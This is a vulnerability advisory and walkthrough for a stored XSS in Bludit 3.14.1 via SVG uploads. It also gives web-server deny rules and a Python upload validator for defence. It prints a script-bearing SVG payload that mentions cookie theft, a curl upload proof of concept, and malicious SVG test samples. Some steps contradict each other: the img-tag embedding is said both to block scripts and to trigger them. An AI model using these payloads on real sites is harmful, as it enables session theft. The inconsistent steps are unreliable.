CVE-2023-34845 - How a File Upload Bug in Bludit v3.14.1 Opens Doors to XSS Attacks
In June 2023, a new vulnerability (CVE-2023-34845) was found in Bludit CMS version 3.14.1. This flaw lets cyber attackers upload files through the /admin/new-content endpoint. The catch? Bludit fails to properly check the type of uploaded files. Hackers can upload a malicious SVG (Scalable Vector Graphics) file, which browsers treat as an image—but SVGs can also hold JavaScript. This bug gives attackers a way to run scripts right in the admin's browser, leading to a Stored Cross-Site Scripting (XSS) attack.
Let's break down how this happens, look at some example code, and show why this bug matters.
What’s the Problem?
Many content management systems (CMS) let users and admins upload media like images. But when file types aren’t properly checked, someone could sneak in dangerous code. Here, Bludit v3.14.1 lets anyone with access to the admin panel upload SVG files that actually contain hidden JavaScript.
How the Vulnerability Works
When you upload a file in Bludit through /admin/new-content, the server is supposed to block everything but safe files. But in version 3.14.1, SVGs are treated just like plain images.
SVG is more than just an image—it’s an XML-based file format that browsers render inside web pages. SVGs can include JavaScript via the <script> tag, which will run when another user (like an admin) views the infected page.
1. The attacker logs in as an admin or as a compromised user.
2. They upload a malicious SVG file via the /admin/new-content endpoint.
3. When someone views the newly uploaded file, the browser executes the JavaScript inside the SVG, letting the attacker do anything from stealing cookies to redirecting users.
1. Create the SVG File
Here’s a simple SVG file that pops up an alert message when opened:
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100"
     xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript">
    alert('XSS by CVE-2023-34845');
    // (Or, steal the admin's cookies/document.cookie here)
  </script>
  <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
</svg>
```
> Tip: Modern browsers restrict SVG script execution depending on how the file is loaded. Scripts in an SVG referenced from an <img> tag are not run, but they are when the SVG is opened directly by its URL or embedded inline.
2. Upload the File
Log in to the Bludit admin dashboard and create a new post (or edit an existing one), then use the upload feature to upload evil.svg.
3. Embed the File
In the content editor, insert the uploaded file, or embed it directly with HTML:
```html
<img src="/bl-content/uploads/pages/evil.svg">
```
4. Trigger the Payload
Once the post is published or previewed, anyone (including the admin) viewing the post will trigger the alert or any other malicious code.
Here's a simple PoC in HTTP using curl:
```bash
curl -i -X POST -F "file=@evil.svg" \
  -b "BLUDIT-KEY=<YOURSESSIONCOOKIE>" \
  http://your-bludit-site.com/admin/ajax/upload-images
```
> Replace <YOURSESSIONCOOKIE> with a valid Bludit session token.
- Data Theft: grabbing user input or stored info.
Any attacker with file-upload access (including low-privileged users, if available) can exploit this bug to attack higher-privilege admins anytime those admins view the poisoned content.
References
- NVD Entry for CVE-2023-34845
- Exploit Database PoC
- Bludit Official Website
- OWASP XSS Guide
Patching
Bludit has addressed this problem in later releases by blocking SVG uploads and improving file type checks. If you’re running Bludit 3.14.1, upgrade immediately. As defence in depth, also refuse SVG files in your own PHP upload handling and in the web server configuration.
For Apache (.htaccess):
```apache
<FilesMatch "\.(svg)$">
  # Apache 2.2 syntax; on Apache 2.4 replace the next two lines with "Require all denied"
  Order Allow,Deny
  Deny from all
</FilesMatch>
```
For Nginx:
```nginx
location ~* \.svg$ {
    deny all;
}
```
Note that both rules block every SVG the server serves, including theme assets; scope them to the uploads directory (bl-content/uploads) if your theme relies on SVG files.
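The server-side check that version 3.14.1 lacked, as an added example that is not Bludit's own code: an extension allow-list combined with body sniffing, so an SVG is rejected even when renamed, and an optional mode that parses SVGs and reports the script vectors (script elements, on* handlers, javascript: hrefs) before they are accepted. The sample uploads, the function names and the allow-list are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET
# Magic bytes for the raster formats an upload endpoint actually needs; SVG is deliberately absent.
MAGIC = {"png": (b"\x89PNG\r\n\x1a\n",), "jpg": (b"\xff\xd8\xff",),
         "jpeg": (b"\xff\xd8\xff",), "gif": (b"GIF87a", b"GIF89a")}
SVG_NS = "{http://www.w3.org/2000/svg}"
SAMPLES = {  # constructed (hypothetical) uploads standing in for files posted to the admin endpoint
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "evil.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    "renamed.png": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
    "logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>',
}

def svg_script_risks(data: bytes) -> list[str]:
    """List the ways an SVG body can run script; an empty list means none were found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    if root.tag not in (SVG_NS + "svg", "svg"):
        return ["XML document is not an SVG"]
    risks = []
    for el in root.iter():  # every element, root included
        if el.tag.split("}")[-1].lower() == "script":
            risks.append("<script> element")
        for attr, val in el.attrib.items():
            name = attr.split("}")[-1].lower()  # strip xlink: and similar namespace prefixes
            if name.startswith("on"):
                risks.append(f"event handler attribute '{name}'")
            elif name == "href" and re.match(r"\s*javascript:", val, re.I):
                risks.append("javascript: URL in href")
    return risks

def validate_upload(filename: str, data: bytes, allow_svg: bool = False) -> tuple[bool, str]:
    """Decide whether an upload may be stored: extension allow-list plus body sniffing."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    # The extension alone is not enough: an SVG renamed to .png is still XML and is caught here.
    if ext == "svg" or data.lstrip()[:5].lower().startswith((b"<?xml", b"<svg", b"<!doc")):
        if not allow_svg:
            return False, "SVG/XML content is not permitted, whatever the extension"
        if ext != "svg":
            return False, f"SVG content hidden under a .{ext} name"
        risks = svg_script_risks(data)
        return (not risks, "; ".join(risks) or "clean SVG")
    if ext not in MAGIC:
        return False, f"extension .{ext} not in allow-list"
    if not data.startswith(MAGIC[ext]):
        return False, f"body does not match a .{ext} file"
    return True, "ok"
```

If SVG uploads must be allowed, treat `svg_script_risks` as a gate in front of a proper sanitizer rather than as the sanitizer itself, and parse untrusted XML with defusedxml in production.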
Final Thoughts
This bug shows how even trusted file formats like SVG can carry hidden dangers. Always keep your CMS updated, use the principle of least privilege, and disable uploads of anything except truly necessary file types!
Stay safe and audit your file uploads.
*This guide is provided as an educational breakdown of CVE-2023-34845. For responsible disclosure and more in-depth details, see the official references linked above.*
Timeline
Published on: 06/16/2023 04:15:00 UTC
Last modified on: 06/23/2023 18:54:00 UTC